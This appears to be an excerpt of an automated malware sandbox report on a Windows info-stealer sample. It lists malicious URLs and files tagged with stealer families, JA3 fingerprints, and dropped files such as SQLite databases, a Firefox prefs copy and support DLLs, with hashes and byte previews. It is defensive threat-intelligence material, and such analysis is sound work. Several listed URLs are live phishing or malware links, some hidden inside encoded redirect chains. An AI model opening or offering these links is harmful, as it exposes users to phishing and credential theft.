	https://nleco-my.sharepoint.com/:u:/p/smartin/EYZSur4py4xKna-WAI8lgIkBS_KVLZwaA2d1wGxZA5Gdvw?e=wwT7sT	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	40.90.136.180
	http://go.stoptrump.io/11087	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	https://ascerta.aha.io/shared/edaa0f8ea0ea06d13e545667a40fae36	Get hash	malicious	Unknown	Browse	150.171.28.10
	https://m.exactag.com/cl.aspx?extProvApi=sixt-crm_newsletter&extProvId=313&extPu=nl_rac_de&extLi=DE_COR_RENT_CRM_B2C_24_CW33_From%20Intermediate%20Push_ONT_NLW_de_DE_Streichpreis_138402&extCr=Footer_rent&extSi=nl_rac_de_2408_DE&url=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%76%69%64%79%61%73%61%67%61%72%2D%70%74%74%69%2E%69%6E%2F%77%61%2F%66%61%2Fsgmflefb4v8va/%2F/bWF0dGhldy5kYXZpc0BtYnUuZWR1	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.60
AKAMAI-ASN1EU	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse	23.223.242.21
	https://bitcoinwisdom.com/these-workers-found-a-giant-snake-you-wont-believe-what-they-found-inside/2/?utm_source=taboola&utm_term=yahoo-aol-mail&utm_medium=cpc&utm_campaign=Snake+US.D_snake&cost=0.13&tblci=GiAmoZnDSKA9Rcvf4CX7BxL2zvlH6pqfvE-XRuuUPfhj0iCA4Woo2fPniM_m2u-_ATDYl18	Get hash	malicious	LiteHTTP Bot	Browse	23.32.112.27
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.198.7.179
	https://ascerta.aha.io/shared/edaa0f8ea0ea06d13e545667a40fae36	Get hash	malicious	Unknown	Browse	2.16.241.4
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.198.7.178
	Le55bnMCON.msi	Get hash	malicious	AteraAgent	Browse	2.22.50.131
	https://assets-usa.mkt.dynamics.com/67a616d1-119c-ef11-8a66-00224806e117/digitalassets/standaloneforms/08a80dd6-5e9c-ef11-8a6a-6045bd04c6a1	Get hash	malicious	Unknown	Browse	172.233.163.56
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.198.7.174
	https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exe	Get hash	malicious	Unknown	Browse	23.198.7.177
	https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exe	Get hash	malicious	Unknown	Browse	23.198.7.177
AKAMAI-ASN1EU	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse	23.223.242.21
	https://bitcoinwisdom.com/these-workers-found-a-giant-snake-you-wont-believe-what-they-found-inside/2/?utm_source=taboola&utm_term=yahoo-aol-mail&utm_medium=cpc&utm_campaign=Snake+US.D_snake&cost=0.13&tblci=GiAmoZnDSKA9Rcvf4CX7BxL2zvlH6pqfvE-XRuuUPfhj0iCA4Woo2fPniM_m2u-_ATDYl18	Get hash	malicious	LiteHTTP Bot	Browse	23.32.112.27
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.198.7.179
	https://ascerta.aha.io/shared/edaa0f8ea0ea06d13e545667a40fae36	Get hash	malicious	Unknown	Browse	2.16.241.4
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.198.7.178
	Le55bnMCON.msi	Get hash	malicious	AteraAgent	Browse	2.22.50.131
	https://assets-usa.mkt.dynamics.com/67a616d1-119c-ef11-8a66-00224806e117/digitalassets/standaloneforms/08a80dd6-5e9c-ef11-8a6a-6045bd04c6a1	Get hash	malicious	Unknown	Browse	172.233.163.56
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.198.7.174
	https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exe	Get hash	malicious	Unknown	Browse	23.198.7.177
	https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exe	Get hash	malicious	Unknown	Browse	23.198.7.177

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	4.245.163.56 184.28.90.27 40.126.32.68 13.107.246.45
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	4.245.163.56 184.28.90.27 40.126.32.68 13.107.246.45
	http://vicrin.com	Get hash	malicious	Unknown	Browse	4.245.163.56 184.28.90.27 40.126.32.68 13.107.246.45
	4734038664.html	Get hash	malicious	HTMLPhisher	Browse	4.245.163.56 184.28.90.27 40.126.32.68 13.107.246.45
	https://www.google.com/url?sa=https://r20.rs6.net/tn.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/dynamicitdevices.com%2Fjoikdjmeue%2FcNSPM5Bl13Sxjki/aGVscGRlc2tAY25jLmJjLmNh	Get hash	malicious	HTMLPhisher	Browse	4.245.163.56 184.28.90.27 40.126.32.68 13.107.246.45
	RFQ500005576.js	Get hash	malicious	AgentTesla	Browse	4.245.163.56 184.28.90.27 40.126.32.68 13.107.246.45
	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse	4.245.163.56 184.28.90.27 40.126.32.68 13.107.246.45
	ACH invoice 4088-27271.msg	Get hash	malicious	Unknown	Browse	4.245.163.56 184.28.90.27 40.126.32.68 13.107.246.45
	https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwi2-r-EpciJAxVQ_8kDHavKJD4QFnoECBYQAQ&usg=AOvVaw0b8qPBQnhqFT1nkSOYsQHT&opi=89978449&url=amp%2Fnew.wowf.org.in%2Fphp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F/	Get hash	malicious	Unknown	Browse	4.245.163.56 184.28.90.27 40.126.32.68 13.107.246.45
	https://bitcoinwisdom.com/these-workers-found-a-giant-snake-you-wont-believe-what-they-found-inside/2/?utm_source=taboola&utm_term=yahoo-aol-mail&utm_medium=cpc&utm_campaign=Snake+US.D_snake&cost=0.13&tblci=GiAmoZnDSKA9Rcvf4CX7BxL2zvlH6pqfvE-XRuuUPfhj0iCA4Woo2fPniM_m2u-_ATDYl18	Get hash	malicious	LiteHTTP Bot	Browse	4.245.163.56 184.28.90.27 40.126.32.68 13.107.246.45

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse
	s6QYhBcJtc.exe	Get hash	malicious	Stealc	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	UTsIm2Lewa.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
C:\ProgramData\chrome.dll	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse
	s6QYhBcJtc.exe	Get hash	malicious	Stealc	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BAFIEGIECGCBKFIEBGCA

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBFBKKJE

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FBGHIIJDGHCBFIECBKEG

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIDGDAKFHIEHJKFHDHDBGIIDAE

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHJJDGHCBGDHIECBGIDAEHCGDG

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03786218306281921
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
MD5:	4BB4A37B8E93E9B0F5D3DF275799D45E
SHA1:	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
SHA-256:	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
SHA-512:	F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIJEBFCFIJJJEBGDBAKE

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	ASCII text, with very long lines (1769), with CRLF line terminators
Category:	dropped
Size (bytes):	9370
Entropy (8bit):	5.514140640374404
Encrypted:	false
SSDEEP:	192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
MD5:	7E44458E0A8A3A7D10875BC3B7AE72D1
SHA1:	E5E6AC8676EE3761DAB13A10EB7573C19F48D297
SHA-256:	21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
SHA-512:	012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\JJJJKEHC

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.265336111907793
Encrypted:	false
SSDEEP:	384:KrJ/2qOB1nxCkMHSAELyKOMq+8HKkjucswRv8p3nVumx:K0q+n0JH9ELyKOMq+8HKkjuczRv89l
MD5:	39C07D5BD8117E270406BA4623AB8FFA
SHA1:	994B2D0DD94F953F7DC3ADE54963482F3911454B
SHA-256:	FC0669A4AC057F5BFC9CDD61221671A95862C94D12B837F7119B87409C239817
SHA-512:	B7F91114D60E6BA301B513EB72324D4FD1C6B9162FB543D6E0DB8A899E04976B781806C0011B7EAAEFFA56B7543EB0EA7B4AE468FEA05EC83415F45912B0C323
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_HrxOpVxK5d.exe_c4c538502255afa8e21eeddb9d9e1292c3c5d5d_f5d3c700_bd7d98b2-6998-40f1-ad36-cf5aaa05f58a\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.062038438696699
Encrypted:	false
SSDEEP:	192:x/0Jr0OTpbjsqZrP2MujzuiFrZ24IO8q/4:p0J4OTpbjlgjzuiFrY4IO8qQ
MD5:	04C680FBBFAF62630AB73A547CE9E2A7
SHA1:	5CB2DB16F7808A29534647BA754849A9D6F0773A
SHA-256:	8180D41E0E4E8598F32E830057A40683CF75344235D32F2F384F829023F72E33
SHA-512:	5527B128A3A6583BFE996C64942BD35F4F8F992D094464D729FFE59AA2C93C6D5ACAE1D4FCD0F84621C561E6EB7D47B73C961E2EF19E040E000CD39A7FD2FDE2
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.5.9.6.8.2.2.1.1.7.3.6.6.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.5.9.6.8.2.2.7.3.5.7.1.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.7.d.9.8.b.2.-.6.9.9.8.-.4.0.f.1.-.a.d.3.6.-.c.f.5.a.a.a.0.5.f.5.8.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.f.9.f.7.a.5.-.c.c.7.b.-.4.9.7.b.-.9.a.b.d.-.f.b.6.0.c.0.9.1.7.b.7.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.r.x.O.p.V.x.K.5.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.f.c.-.0.0.0.1.-.0.0.1.4.-.f.c.9.4.-.8.0.4.6.4.9.3.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.a.a.8.6.6.c.b.3.3.2.a.4.e.b.c.e.9.4.c.3.4.1.4.4.a.7.e.4.5.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.f.0.6.9.c.e.0.f.8.8.7.a.f.1.2.5.a.a.6.0.6.f.0.0.4.f.0.b.7.b.a.a.f.7.2.5.f.3.0.0.!.H.r.x.O.p.V.x.K.5.d...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8413.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Nov 9 03:33:42 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	53582
Entropy (8bit):	2.509987175292781
Encrypted:	false
SSDEEP:	192:3XKXay9LgrPXtBllOgOJwkbBM7DMtZ0unWwCEV2GBzg/HfDoL1OepnaHFGPmRcr:09LgrflIgEBaDshV2Gyv0VpaNRcr
MD5:	2D313DBCE4E0568621C1FB8D529E8F56
SHA1:	C4513B4F5DC80B29F9E039C75B620929A22C0CE4
SHA-256:	41424F4845418866994753D5344F55F9E01E5A30920E5682A0A192FD0507DFEF
SHA-512:	0162F0FF0852BE5CAE7606AD2A275B50BCCE5CC692F59C12803926F27F4727188FF6BF8E0A6D15ECA1EA201F39AC912F57597372B3F493AA5FCD16AEF58DBAF9
Malicious:	false
Preview:	MDMP..a..... ..........g............4...............<.......t....2..........T.......8...........T........... Y...x...........#...........%..............................................................................eJ.......%......GenuineIntel............T..............g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER856B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.7025762930863673
Encrypted:	false
SSDEEP:	192:R6l7wVeJ6j6uR6YNfLSU9mIgmfxdpDt89bSIsf6mm:R6lXJW6uR6YJSU9mIgmfxyS7fC
MD5:	91EE67A532697043B485024E3529F37F
SHA1:	F31D37F8D592C076F33AF05E7BEE5F0565A393BE
SHA-256:	EDFEA59AE6B1B22E42F13D3E93D07FAAA8B3C23ACEDFE6F35E778A1FB35FFC75
SHA-512:	07302BF42C6F4BC231D2990B7A176ADDC211B503623016B3B42E97818D7F4DCED074B7E45F46EEBD5E2E824F90B39A4A4E1C4D606E4D9A568881D3E6785A7F68
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER85AB.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4579
Entropy (8bit):	4.46992121588829
Encrypted:	false
SSDEEP:	48:cvIwWl8zsbJg77aI9QTWpW8VYEYm8M4JqeEFcv+q8+OQa3CECUd:uIjf1I7Si7VcJj5vSPxCUd
MD5:	B38B4B5F3F65EB54315047E7C5A158EF
SHA1:	0517679AF40327E5BCB3E776CE0B25CC48817E70
SHA-256:	B086E5CADD18D5EF87C159EC2BB1AC578A90ED25CBD155C04FDB9ACC6E7E2B8C
SHA-512:	131F0D038DB74E54C38645692B0BEA41A55E18873865B21708E60B204CB0724CB6E3848643827D8258993AEA64DC8C646AB08DA5004D20909D9BBE6114C76748
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="579996" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\chrome.dll

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	692736
Entropy (8bit):	6.304379785339226
Encrypted:	false
SSDEEP:	12288:Kk5nGNLFzxC+gej5yNcTN+pt+tLK75PL2rn65hYVKKuKOvy/j3t:KMGNL/geFyNcTN+jv75TQn652VBuNyb
MD5:	EDA18948A989176F4EEBB175CE806255
SHA1:	FF22A3D5F5FB705137F233C36622C79EAB995897
SHA-256:	81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
SHA-512:	160ED9990C37A4753FC0F5111C94414568654AFBEDC05308308197DF2A99594F2D5D8FE511FD2279543A869ED20248E603D88A0B9B8FB119E8E6131B0C52FF85
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: s6QYhBcJtc.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s,.>7M.m7M.m7M.m\|5.l<M.m\|5.l.M.m\|5.l#M.m'..l"M.m'..l'M.m'..l.M.m\|5.l:M.m7M.m.M.m7M.mlM.m...l6M.m...l6M.mRich7M.m........................PE..L......g.........."!...)............P.....................................................@..........................\..l...<].................................. 8...(..T....................(......@'..@............................................text............................... ..`.rdata..zV.......X..................@..@.data...T....p.......N..............@....reloc.. 8.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
